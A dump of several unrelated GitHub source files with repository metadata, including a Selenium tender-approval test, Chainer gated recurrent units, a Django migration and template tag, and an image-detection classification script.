    position, foodGrid = state

    def getDistance(pos1, pos2, gameStartState):
        # Memoized exact maze distance between two points.
        cache = problem.heuristicInfo.setdefault('mazeDistances', {})
        key = (pos1, pos2)
        if key not in cache:
            childProblem = PositionSearchProblem(
                gameStartState, start=pos1, goal=pos2, warn=False, visualize=False)
            cache[key] = len(search.breadthFirstSearch(childProblem))
        return cache[key]

    farthest = 0
    for food in foodGrid.asList():
        length = getDistance(position, food, problem.startingGameState)
        if length > farthest:
            farthest = length
    return farthest
| [
"blueice-thu@outlook.com"
] | blueice-thu@outlook.com |
e41f7a4ee3dff131d8b4f169176cf7ead839fc16 | 8af82d8482761aa99f6db95527a20c8854c00fdb | /PT_Approve.py | e951714fc9aff612626a16950f2f94ad0101e9a3 | [] | no_license | vandy1992/SCM-Automation | 62c02f665dcf42e79459f7aec575f07e35720c81 | 38c4266b943ece80df66ea32ba22f774a46df6c6 | refs/heads/master | 2022-11-20T13:15:56.572776 | 2020-07-10T09:05:47 | 2020-07-10T09:05:47 | 278,587,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,805 | py | import unittest
# import HtmlTestRunner
import time
import allure
from allure_commons.types import AttachmentType
from selenium import webdriver
import sys
sys.path.append("C://Users/Vandana Mallaiah/PycharmProjects/loginpage") #run through cmd and to generate report we need this or else no need
from pages.purchase_tender_page import Purchase_Tender
#https://clever-brahmagupta-0d6b23.netlify.app
class purchase_tender_Test(unittest.TestCase):
    """End-to-end Selenium scenario: create a foreign Purchase Tender, send it
    for approval, approve it, inspect it in list view, then delete it.

    Screenshots are attached to the Allure report at each major step.
    NOTE(review): credentials, driver path and test data are hard-coded below —
    consider moving them to configuration.
    """
    # Environment under test and login credentials.
    baseURL="https://testscm.digicollect.com/"
    email ="manager@testdigibar.com"
    password ="testdigibar123"
    # driver = webdriver.Firefox(executable_path="E:\geckodriver-v0.26.0-win64\geckodriver.exe")
    driver = webdriver.Chrome(executable_path="E:\chromedriver_win32\chromedriver.exe")
    # Test data: purchase-request number, branch name, tender number.
    prno="DIGICOLLECT1234"
    Bran="Test Digibar"
    trno="vandy@@K654"
    @classmethod
    def setUpClass(cls):
        # Open the application once for the whole test class.
        cls.driver.get(cls.baseURL)
        cls.driver.maximize_window()
    def test_Purchase_tender(self):
        """Drive the full create → approve → view → delete tender workflow
        through the Purchase_Tender page object."""
        pt=Purchase_Tender(self.driver)
        time.sleep(3)
        allure.attach(self.driver.get_screenshot_as_png(), name="loginpage", attachment_type=AttachmentType.PNG)
        pt.login_page("manager@testdigibar.com","testdigibar123")
        time.sleep(5)
        allure.attach(self.driver.get_screenshot_as_png(), name="homepage", attachment_type=AttachmentType.PNG)
        # Fill in the tender creation form.
        pt.click_create_new()
        time.sleep(3)
        pt.click_foreign()
        time.sleep(3)
        pt.click_tr_no(self.trno)
        pt.click_pr_no()
        pt.click_branch()
        pt.click_dept()
        pt.click_Attention()
        pt.click_date()
        pt.click_currency()
        pt.click_authorised()
        pt.click_phone()
        # pt.click_address()
        # pt.click_Save()
        pt.click_same_as_billing()
        pt.click_product()
        pt.other_info()
        # pt.file_attach()
        # Submit and walk the approval flow.
        pt.click_saveandsend()
        allure.attach(self.driver.get_screenshot_as_png(), name="sendapproval", attachment_type=AttachmentType.PNG)
        pt.approval()
        pt.click_send()
        pt.click_approve()
        pt.enter_note()
        pt.click_yes()
        # Verify the tender in list view, check the attachment, then delete it.
        pt.click_List()
        allure.attach(self.driver.get_screenshot_as_png(), name="listview", attachment_type=AttachmentType.PNG)
        pt.click_single()
        # pt.click_approved()
        pt.click_view_attach()
        allure.attach(self.driver.get_screenshot_as_png(), name="viewattach", attachment_type=AttachmentType.PNG)
        pt.click_close()
        pt.click_single()
        pt.click_list_delete()
        allure.attach(self.driver.get_screenshot_as_png(), name="delete", attachment_type=AttachmentType.PNG)
#
if __name__=='__main__':
unittest.main() | [
"noreply@github.com"
] | vandy1992.noreply@github.com |
5d911f4022457d7e47942adf723047dc59cefa2f | 4a5f3b26fca176a80ca8eca796bc646bb225b017 | /attentive-reader-2/sgu.py | 8ddc21a3a0732b54672764fcd0003dcc2dec4e7a | [] | no_license | musyoku/NLP | 9a63dc882b07b017f7cfc72d863c4d9e5cbeff5e | 9b040bb960b65fb2a1c330adafa6c52e3284a0c1 | refs/heads/master | 2021-01-21T04:53:57.029200 | 2016-07-10T17:08:03 | 2016-07-10T17:08:03 | 55,848,677 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,107 | py | import numpy
import chainer
from chainer import cuda
from chainer.functions.activation import sigmoid
from chainer.functions.activation import softplus
from chainer.functions.activation import tanh
from chainer.functions.math import clip
from chainer import link
from chainer.links.connection import linear
from chainer import variable
def hard_sigmoid(x):
    # Piecewise-linear sigmoid approximation: clip(0.2*x + 0.5) to [0, 1].
    return clip.clip(x * 0.2 + 0.5, 0.0, 1.0)
class SGU(link.Chain):
    """Stateless Simple Gated Unit (recurrent cell) as a Chainer link.

    Takes the previous hidden state `h` and the current input `x`, and
    returns the new hidden state. NOTE(review): presumably the SGU from
    "Deep Gate Recurrent Neural Network" — confirm against the paper.
    """
    def __init__(self, in_size, out_size):
        # Four learned linear maps: input->gate, state-mix, and the two
        # halves of the update gate z_t.
        super(SGU, self).__init__(
            W_xh=linear.Linear(in_size, out_size),
            W_zxh=linear.Linear(out_size, out_size),
            W_xz=linear.Linear(in_size, out_size),
            W_hz=linear.Linear(out_size, out_size),
        )

    def __call__(self, h, x):
        # Candidate state: softplus(tanh(W_zxh(W_xh(x) * h)) * h)
        x_g = self.W_xh(x)
        z_g = tanh.tanh(self.W_zxh(x_g * h))
        z_out = softplus.softplus(z_g * h)
        # Update gate in [0, 1] blends old state with the candidate.
        z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
        h_t = (1 - z_t) * h + z_t * z_out
        return h_t
class StatefulSGU(SGU):
    """SGU that stores its own hidden state `self.h` between calls."""
    def __init__(self, in_size, out_size):
        super(StatefulSGU, self).__init__(in_size, out_size)
        self.state_size = out_size
        self.reset_state()

    def to_cpu(self):
        # Keep the stored state on the same device as the parameters.
        super(StatefulSGU, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()

    def to_gpu(self, device=None):
        super(StatefulSGU, self).to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)

    def set_state(self, h):
        # Install an externally supplied state, moved to this link's device.
        assert isinstance(h, chainer.Variable)
        h_ = h
        if self.xp == numpy:
            h_.to_cpu()
        else:
            h_.to_gpu()
        self.h = h_

    def reset_state(self):
        # Forget the stored state; the next call re-initializes from zeros.
        self.h = None

    def __call__(self, x):
        if self.h is None:
            # First step: run the cell equations with h = 0.
            xp = cuda.get_array_module(x)
            zero = variable.Variable(xp.zeros_like(x.data))
            z_out = softplus.softplus(zero)
            z_t = hard_sigmoid(self.W_xz(x))
            h_t = z_t * z_out
        else:
            h_t = SGU.__call__(self, self.h, x)
        self.h = h_t
        return h_t
class DSGU(link.Chain):
    """Stateless Deep Simple Gated Unit: like SGU, but the candidate state is
    passed through an extra learned sigmoid output gate (W_go)."""
    def __init__(self, in_size, out_size):
        super(DSGU, self).__init__(
            W_xh=linear.Linear(in_size, out_size),
            W_zxh=linear.Linear(out_size, out_size),
            W_go=linear.Linear(out_size, out_size),
            W_xz=linear.Linear(in_size, out_size),
            W_hz=linear.Linear(out_size, out_size),
        )

    def __call__(self, h, x):
        x_g = self.W_xh(x)
        z_g = tanh.tanh(self.W_zxh(x_g * h))
        # Extra output projection compared to SGU (sigmoid instead of softplus).
        z_out = sigmoid.sigmoid(self.W_go(z_g * h))
        z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
        h_t = (1 - z_t) * h + z_t * z_out
        return h_t
class StatefulDSGU(DSGU):
    """DSGU that stores its own hidden state `self.h` between calls.

    NOTE(review): the device-management methods duplicate StatefulSGU's —
    a shared mixin would remove the copy-paste.
    """
    def __init__(self, in_size, out_size):
        super(StatefulDSGU, self).__init__(in_size, out_size)
        self.state_size = out_size
        self.reset_state()

    def to_cpu(self):
        # Keep the stored state on the same device as the parameters.
        super(StatefulDSGU, self).to_cpu()
        if self.h is not None:
            self.h.to_cpu()

    def to_gpu(self, device=None):
        super(StatefulDSGU, self).to_gpu(device)
        if self.h is not None:
            self.h.to_gpu(device)

    def set_state(self, h):
        # Install an externally supplied state, moved to this link's device.
        assert isinstance(h, chainer.Variable)
        h_ = h
        if self.xp == numpy:
            h_.to_cpu()
        else:
            h_.to_gpu()
        self.h = h_

    def reset_state(self):
        self.h = None

    def __call__(self, x):
        if self.h is None:
            # First step with h = 0: sigmoid(0) = 0.5, so h_t = 0.5 * z_t.
            z_t = hard_sigmoid(self.W_xz(x))
            h_t = z_t * 0.5
        else:
            h_t = DSGU.__call__(self, self.h, x)
        self.h = h_t
        return h_t
"musyoku@users.noreply.github.com"
] | musyoku@users.noreply.github.com |
b215c554ca3a503adec1ad978c11a8f6d483768c | 2d71efd7d8eecd057ba1705ae61bef03358b7605 | /heating/common.py | 4fa33355fe10a9902743eddfea3219bcf3a5bd75 | [] | no_license | graememorgan/smart-thermostat | 9a35765b32b324e907eab76ee36e645ac77d2711 | 7b2294de8d0752f9518f50541a1f2b42610bcb26 | refs/heads/master | 2021-01-10T10:52:36.556316 | 2016-02-04T13:30:02 | 2016-02-04T13:30:02 | 50,459,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | import datetime
def epoch(date):
    """Return *date* (a naive `datetime.datetime`) as seconds since the Unix
    epoch, 1970-01-01 00:00:00, as a float. No timezone handling is done."""
    unix_epoch = datetime.datetime(1970, 1, 1)
    return (date - unix_epoch).total_seconds()
| [
"mail@graeme.io"
] | mail@graeme.io |
90ab9fd8dbaf028130901ea8dc146e64dc36e060 | 8270ee8435d2c95dcc9f0e8f9f2119a45cafdf34 | /authentication/authentication/urls.py | 62d83125245dc2239a6a24bc1a945d75afe0e38f | [] | no_license | venkatapriya2020/Django_Hands_On | d8fa20124181f8ed59aaea91f2c3ebfec45495b6 | 28bd9d6fd95730c8f85c40c0d284d2d7cb3fe462 | refs/heads/master | 2023-02-04T05:19:42.708484 | 2020-12-20T22:32:28 | 2020-12-20T22:32:28 | 323,177,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | """authentication URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path , include
urlpatterns = [
path("",include("users.urls")),
path('admin/', admin.site.urls),
]
| [
"venkatapriya@live.com"
] | venkatapriya@live.com |
bdf356f1b24561547e82750dcf298ac1a820f9f4 | f53ebcc05ccc8892c32fc2b5c121ba0d78451adb | /classify_images.py | a0f79e4a9fbf09917707b7f53e0b97d22a0ea8eb | [] | no_license | XDUNZC/TBtianchi_submit | 4a45e1096fa389ea9123647e7caaa7cb52a9c322 | e6b1497c0063379f34f9e8cab4926fb160944fdd | refs/heads/master | 2023-08-15T19:45:07.112471 | 2020-04-12T06:56:57 | 2020-04-12T06:56:57 | 249,676,498 | 0 | 0 | null | 2023-07-23T09:42:19 | 2020-03-24T10:20:56 | Jupyter Notebook | UTF-8 | Python | false | false | 4,010 | py | from read_dataset import Reader
from save import Saver
from model.Resnet50.run import Worker as MatchWorker
from model.mmdetection_coco import run as DetectionWorker
import utils
import os
import mmcv
import random
class Classifier():
    """Run the detection model over every commodity image, bucket commodities
    by their most frequent detected labels, and prune each commodity's image
    list down to a couple of representative images.

    NOTE(review): the number of classes (23) is assumed from the detector's
    label space — confirm against the model config.
    """
    def __init__(self,classify_model,reader):
        self.classify_model = classify_model
        self.reader = reader
        # label -> set of commodity indices assigned to it
        self.class2commoditys = {i:set() for i in range(23)}
        # image path -> (boxes over threshold, labels over threshold)
        self.img_boxes_label_result = {}
        self._classify_image()
    def _classify_image(self):
        print('开始检测所有商品图,并进行分类剪枝:')
        for commodity in mmcv.track_iter_progress(self.reader.commodity_index_list):
            # Count how often each label appears across this commodity's images.
            labels_in_this_commodity = {i:0 for i in range(23)}
            imgs_in_this_commodity = list(self.reader.commodity_index2img_path_list[commodity])
            for img in imgs_in_this_commodity:
                result_over_thr, labels_over_thr, _ = DetectionWorker.get_result_and_feats(self.classify_model, img)
                self.img_boxes_label_result[img] = (result_over_thr, labels_over_thr)
                for label in labels_over_thr:
                    labels_in_this_commodity[label]+=1
            # Keep the two most frequent labels.
            labels_in_this_commodity_list = sorted(labels_in_this_commodity.items(), key=lambda x: x[1], reverse=True)[:2]
            for i,item in enumerate(labels_in_this_commodity_list):
                label, appear_num = item
                if i!=0 and appear_num==0:
                    break
                self.class2commoditys[label].add(commodity)  # assign the commodity to this label
            # Pick representative images for the commodity (pruning step).
            top_labels = [label for label, _ in labels_in_this_commodity_list]
            present_imgs = []
            random.shuffle(imgs_in_this_commodity)
            for img in imgs_in_this_commodity:
                result_over_thr, labels_over_thr = self.img_boxes_label_result[img]
                # BUG FIX: the original tested `(label, count)` tuples for
                # membership in labels_over_thr (a collection of labels), which
                # could never match; compare the labels themselves instead.
                if any(label in labels_over_thr for label in top_labels):
                    present_imgs.append(img)
                if len(present_imgs) == 2:  # number of images to keep
                    break
            self.reader.commodity_index2img_path_list[commodity] = present_imgs
    def show_classify_result(self):
        for label,commoditys in self.class2commoditys.items():
            print('lable: ',label,' commoditys: ',commoditys)
def main():
    """Entry point: wire up the dataset reader, result saver and detection
    model, then build the Classifier (which runs detection + pruning)."""
    # 初始化文件路径获得类
    reader = Reader(test_dataset_path='tcdata/',
                    img_path='tcdata/test_dataset_3w/image/',
                    video_path='tcdata/test_dataset_3w/video/')
    print("success init reader")
    # 初始化结果保存类
    saver = Saver()
    print("success init saver")
    # 执行匹配工作
    """初始化匹配模型"""
    # TODO 替换参数
    # match_worker = MatchWorker(model_path='./model/Resnet50/models/model-inter-500001.pt')
    print("success load match model")
    """初始化获得框模型"""
    # NOTE(review): config_file has 4 candidate entries but checkpoint_file
    # only 2, and only index 0 carries a full directory path — any idx other
    # than 0 would produce an invalid path. Confirm intended values.
    idx = 0
    config_file = ['./model/mmdetection_coco/configs/tbtc_fater_rcnn_voc.py',
                   'tbtc_retinanet_voc.py', 'tbtc_feature_exteactor_faster_rcnn.py',
                   'tbtc_feature_exteactor_faster_rcnn.py'][idx]
    checkpoint_file = ['./model/mmdetection_coco/checkpoints/faster_rcnn_x101_64x4d_fpn_1x20200324-ba5926a5.pth',
                       'retinanet_x101_64x4d_fpn_1x20200322-53c08bb4.pth'][idx]
    # TODO 替换参数
    coco_model = DetectionWorker.get_model(config_file=config_file,
                                           checkpoint_file=checkpoint_file)
    print("success load detection model")
    """逐个视频运行"""
    classifier = Classifier(coco_model,reader)
    print("success build classifier")
    # 显示分类结果,正式提交的时候请注释
    classifier.show_classify_result()
if __name__ == "__main__":
# success run
print("successful open run.py")
main()
# end run
print("successful end test.py")
| [
"903244773@qq.com"
] | 903244773@qq.com |
a1e59a682c3d21feebcf29921ab2ec3829992fd1 | de3a062138d3fbdfcf76e09915be553aea450e61 | /Tests.py | 2b1454136905d54427a60069f63bcf68cbcf68c4 | [] | no_license | AlyonaMon/autotests | be9d0793ad36f917d7315325c3071042b592207f | 4457f7f3f5ef65b1b67b08221e43693bf7c742f3 | refs/heads/master | 2021-01-11T18:54:34.717373 | 2016-11-14T21:35:02 | 2016-11-14T21:35:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,032 | py | # coding=utf-8
import json
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(datefmt='%m/%d/%Y %I:%M:%S %p', filename="msg.log",
format='%(asctime)s %(name)-20s %(levelname)-8s %(message)s', filemode='w')
from xml.etree import ElementTree
import xml.etree.ElementTree as etree
from xml.dom import minidom
from xml.etree.ElementTree import Element, SubElement, Comment
import csv
global response, test_dic_for_case, name_testsuite, name_testcase
def prettify(elem):
    """Return a pretty-printed XML string for the ElementTree element *elem*."""
    raw_bytes = ElementTree.tostring(elem, 'utf-8')
    return minidom.parseString(raw_bytes).toprettyxml(indent=" ")
# def XML_FILE(name_testsuite, name_testcase, m):
# # print name_testcase, name_testsuite
# top = Element('testsuites', name=str(name_testsuite))
# parent = SubElement(top, 'testsuite', name=str(name_testcase))
# # children = [Element('testsuite', name=str(Tests(response)))]
#
# top.extend(parent)
# return prettify(top)
def STATUS_CODE(response):
    """Check that the HTTP status code is 200 or 201.

    Returns "<message>: <True|False>".
    """
    passed = response.status_code in (200, 201)
    if passed:
        message = "Response code is 200 or 201"
    else:
        message = "Response code is " + str(response.status_code)
    return message + ": " + str(passed)
def STATUS_CODE_NAME(response):
    """Check that the status reason phrase is exactly 'OK'.

    Returns "<message>: <True|False>".
    """
    reason = str(response.reason)
    if response.reason == 'OK':
        return "Status code name has string '" + reason + "': True"
    return "Status code name '" + reason + "': False"
def RESPONSE_TIME(response):
    """Check that the round-trip time is below 0.5.

    Returns "<message>: <value>ms". NOTE: `elapsed.total_seconds()` returns
    seconds, although the message labels the value "ms" — kept as-is to
    preserve the original output format.
    """
    elapsed = response.elapsed.total_seconds()
    if elapsed < 0.5:
        message = "Response time is less than 0.5ms"
        outcome = elapsed
    else:
        message = "Response time is more than 0.5ms"
        outcome = "False, time is " + str(elapsed)
    return message + ": " + str(outcome) + "ms"
def CONTENT_TYPE_IS_PRESENT(response):
    """Check that the response body is non-empty.

    Returns "<message>: <True|False>". NOTE(review): the comparison is
    against the empty *str*; with a `requests` response, `.content` is bytes
    and b'' != '' is True, so an empty bytes body still reports present —
    behavior kept identical to the original.
    """
    present = response.content != ""
    if present:
        message = "Content type is present"
    else:
        message = "Content type is not present"
    return message + ": " + str(present)
def RESPONSE_HAS_ACCKEY(r):
    """Check that the decoded JSON body *r* (a dict) contains "access_key".

    Returns "<message>: <True|False>". Side effects: writes to the module
    logger; on failure it also raises the logger's level to ERROR globally —
    NOTE(review): that mutation persists for the rest of the run and looks
    unintended; confirm.
    """
    text = "Access Key present in response "
    if "access_key" in r:
        result = r["access_key"]
        logger.info('Authentication is successful')
        logger.info('Access Key present in response: %s', str(result))
        text = text + ": " + str(True)
    elif "Message" in r:
        # Server returned an error payload instead of a key.
        logger.setLevel(logging.ERROR)
        logger.error('Access Key absent in response: %s', str(r))
        text = text + ": " + str(False)
    else:
        # Neither a key nor an error message — unexpected response shape.
        logger.setLevel(logging.ERROR)
        logger.error('Fails for an paar App key - Access Key')
        text = text + ": " + str(False)
    # print text
    return text
#
# def _is_empty(text):
# return not text or text.isspace()
"""def indent(elem, level=0, tab=' '):
i = '\n' + level * tab
j = i + tab # j = i_n+1
indent_parent = False
if len(elem):
if _is_empty(elem.text):
# Indent before element.
elem.text = j
if _is_empty(elem.tail):
# Indent after element.
elem.tail = i
prev = None
for child in elem:
indent_block = indent(child, level + 1, tab)
if indent_block or len(child) > 1:
# This child or some lower child block should be super-indented.
if len(elem) == 1:
# Pass indentation up because this level only has one child.
indent_parent = True
else:
# Surround this block with newlines for emphasis.
if prev is not None and _is_empty(prev.tail):
prev.tail = '\n' + j
if _is_empty(child.tail):
child.tail = '\n' + j
prev = child
if _is_empty(child.tail):
# Last child element determines closing tag tab level.
child.tail = i
else:
if level and _is_empty(elem.tail):
elem.tail = i
return indent_parent"""
def Tests(response, test_dic_for_case, name_testcase, top):
    """Run the checks named in *test_dic_for_case* against *response* and
    record each as a JUnit-style <testcase> under a new
    <testsuite name=name_testcase> appended to *top*.

    Each check returns a "<message>: <True|False>" string; any message
    containing 'False' gets a <failure> child so report tools flag it.
    """
    parent = SubElement(top, 'testsuite', name=str(name_testcase))
    # (name looked up in test_dic_for_case, callable producing the result
    # string). The tuple order fixes the <testcase> order in the XML, matching
    # the original branch order.
    checks = (
        ("STATUS_CODE", lambda r: STATUS_CODE(r)),
        ("STATUS_CODE_NAME", lambda r: STATUS_CODE_NAME(r)),
        ("RESPONSE_TIME", lambda r: RESPONSE_TIME(r)),
        ("CONTENT_TYPE_IS_PRESENT", lambda r: CONTENT_TYPE_IS_PRESENT(r)),
        # This check inspects the decoded JSON body, not the response object.
        ("RESPONSE_HAS_ACCKEY",
         lambda r: RESPONSE_HAS_ACCKEY(json.loads(r.__dict__["_content"]))),
    )
    for check_name, run_check in checks:
        if check_name not in test_dic_for_case:
            continue
        message = run_check(response)
        testcase = SubElement(parent, 'testcase', name=str(message))
        if 'False' in message:
            failure = SubElement(testcase, 'failure', type="AssertionFailure")
            failed = SubElement(failure, 'failed')
            failed.text = "![CDATA[Failed]]"
    # NOTE: the original's parent.extend(...)/children_1.extend(...) calls
    # iterated freshly created, childless elements, i.e. were no-ops
    # (SubElement already attaches each node to its parent), so they are
    # intentionally dropped.
| [
"evmon@ex.ua"
] | evmon@ex.ua |
392d504d2b4be2f95ee073ec8a8beccce1d6bd49 | d1a111119ec7aed797d1487b9a5740217d43effc | /students/templatetags/tags.py | 28e1e2ea85fd52a4ce90660cb5ee127a9c1a29cf | [] | no_license | shurique/student_task | 3f693f20691971f9e7fee03e8cc4cffd130aa53b | 2cf873adbc8657ac31e6efc4c12805c0387a67d7 | refs/heads/master | 2021-01-10T22:20:51.941404 | 2012-02-03T08:31:30 | 2012-02-03T08:31:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | #-*-coding: utf-8 -*-
from django import template
from django.core import urlresolvers
from django.contrib.contenttypes.models import ContentType
register = template.Library()
class EditListNode(template.Node):
    """Template node that renders the Django-admin change URL for the object
    stored in the given template variable."""
    def __init__(self, value):
        # `value` is the raw variable name from the template tag.
        self.var = template.Variable(value)

    def render(self, context):
        var = self.var.resolve(context)
        # Build "admin:<app>_<model>_change" from the object's content type.
        ctype = ContentType.objects.get_for_model(type(var))
        link = u'admin:%s_%s_change' % (ctype.app_label, ctype.model)
        return urlresolvers.reverse(link, args=(var.id,))
@register.tag
def edit_list(parser, token):
    """Template tag `{% edit_list obj %}`: emit the admin change-page URL
    for *obj*. Requires exactly one argument."""
    try:
        tag_name, value = token.split_contents()
    except ValueError:
        # Error message intentionally kept in Russian ("Tag %r requires one
        # argument") — it is user-facing template output.
        msg = u'Тег %r требует один аргумент' % token.split_contents()[0]
        raise template.TemplateSyntaxError(msg)
    return EditListNode(value)
| [
"godetskiy@ya.ru"
] | godetskiy@ya.ru |
b393a423256aa0f889b3a2d9a5f23682e1c3053d | 31136f3b2aa9ff7166f771a7f4e1da8dd1764b2e | /website/events/migrations/0005_auto_20190715_1440.py | ec4ca8cd745c5758545e2f31f6086ffdfe7a64c0 | [
"MIT"
] | permissive | PyAr/asoc_members | 202bb05f6c58644f5edb19c80a7276b493d3c76b | ed3944acadd7d08e53acd6edb5961a4248ea4782 | refs/heads/master | 2023-04-15T07:41:45.725797 | 2023-04-11T15:13:24 | 2023-04-11T15:13:24 | 131,543,379 | 10 | 26 | MIT | 2023-08-22T22:41:12 | 2018-04-30T01:10:30 | Python | UTF-8 | Python | false | false | 7,405 | py | # Generated by Django 2.0.4 on 2019-07-15 14:40
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import events.helpers.models
import events.models
class Migration(migrations.Migration):
    """Create the expense-tracking models for events.

    Adds Expense (base), Payment, Provider, plus the multi-table-inheritance
    children OrganizerRefund and ProviderExpense, and wires the audit
    (created_by/changed_by) and event foreign keys.
    """
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('events', '0004_auto_20190618_1853'),
    ]
    operations = [
        # Base expense record; OrganizerRefund/ProviderExpense inherit from it below.
        migrations.CreateModel(
            name='Expense',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('description', models.CharField(blank=True, default='', help_text='Descripción del gasto', max_length=317, verbose_name='descripción')),
                ('amount', models.DecimalField(decimal_places=2, max_digits=18, verbose_name='monto')),
                ('invoice_type', models.CharField(choices=[('A', 'Factura A'), ('B', 'Factura B'), ('C', 'Factura C'), ('Tic', 'Ticket'), ('Otr', 'Otro')], max_length=5, verbose_name='tipo factura')),
                ('invoice_date', models.DateField(verbose_name='fecha factura')),
                ('invoice', models.FileField(upload_to=events.models.expense_upload_path, verbose_name='factura')),
                ('category', models.CharField(choices=[('Prv', 'Gasto proveedor'), ('Ref', 'Reintegro organizador')], max_length=5, verbose_name='tipo gasto')),
            ],
            options={
                'permissions': (('view_expenses', 'puede ver gastos'),),
            },
            bases=(events.helpers.models.SaveReversionMixin, models.Model),
        ),
        migrations.CreateModel(
            name='Payment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('document', models.FileField(upload_to='media/events/payments/', verbose_name='comprobante')),
                ('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_changed_by', to=settings.AUTH_USER_MODEL)),
                ('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_created_by', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'abstract': False,
            },
            bases=(events.helpers.models.SaveReversionMixin, models.Model),
        ),
        migrations.CreateModel(
            name='Provider',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
                ('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
                ('document_number', models.CharField(help_text='CUIT del propietario de la cuenta, formato ##-########-#', max_length=13, unique=True, validators=[django.core.validators.RegexValidator('^(20|23|24|27|30|33|34)-[0-9]{8}-[0-9]$', 'El CUIT ingresado no es correcto.')], verbose_name='CUIT')),
                ('bank_entity', models.CharField(help_text='Nombre de la entiedad bancaria.', max_length=317, verbose_name='entidad bancaria')),
                ('account_number', models.CharField(help_text='Número de cuenta.', max_length=13, verbose_name='número de cuenta')),
                ('account_type', models.CharField(choices=[('CC', 'Cuenta corriente'), ('CA', 'Caja de ahorros')], max_length=3, verbose_name='Tipo cuenta')),
                ('organization_name', models.CharField(help_text='Razón social o nombre del propietario de la cuenta.', max_length=317, verbose_name='razón social')),
                ('cbu', models.CharField(help_text='CBU de la cuenta', max_length=317, verbose_name='CBU')),
                ('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_changed_by', to=settings.AUTH_USER_MODEL)),
                ('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_created_by', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'ordering': ['-created'],
                'permissions': (('view_providers', 'puede ver proveedores'),),
            },
            bases=(events.helpers.models.SaveReversionMixin, models.Model),
        ),
        # Multi-table-inheritance children of Expense (note the expense_ptr parent links).
        migrations.CreateModel(
            name='OrganizerRefund',
            fields=[
                ('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
                ('organizer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='refunds', to='events.Organizer', verbose_name='Organizador')),
                ('payment', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
            ],
            options={
                'abstract': False,
            },
            bases=('events.expense',),
        ),
        migrations.CreateModel(
            name='ProviderExpense',
            fields=[
                ('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
                ('payment', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
                ('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Provider', verbose_name='Proveedor')),
            ],
            options={
                'abstract': False,
            },
            bases=('events.expense',),
        ),
        migrations.AddField(
            model_name='expense',
            name='changed_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_changed_by', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='expense',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_created_by', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='expense',
            name='event',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Event', verbose_name='Evento'),
        ),
    ]
| [
"andres.ramirez.miori@gmail.com"
] | andres.ramirez.miori@gmail.com |
